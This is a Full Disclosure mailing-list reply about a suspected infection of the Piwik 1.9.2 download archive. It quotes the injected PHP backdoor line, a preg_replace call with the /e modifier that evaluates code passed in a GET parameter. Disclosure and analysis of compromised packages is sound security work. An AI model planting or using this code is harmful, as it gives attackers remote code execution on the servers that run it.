Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Possible infection of Piwik 1.9.2 download archive
From: Christian Sciberras <uuf6429 () gmail com>
Date: Tue, 27 Nov 2012 12:54:57 +0100

At the moment I'm trying to figure out the further sense of this code,
but it seems that there might also be some kind of backdoor (because of
the use of $_GET).

preg_replace("/(.+)/e", $_GET['g'], 'dwm');

You think?


On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker <max () grobecker-wtal de

preg_replace("/(.+)/e", $_GET['g'], 'dwm');
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]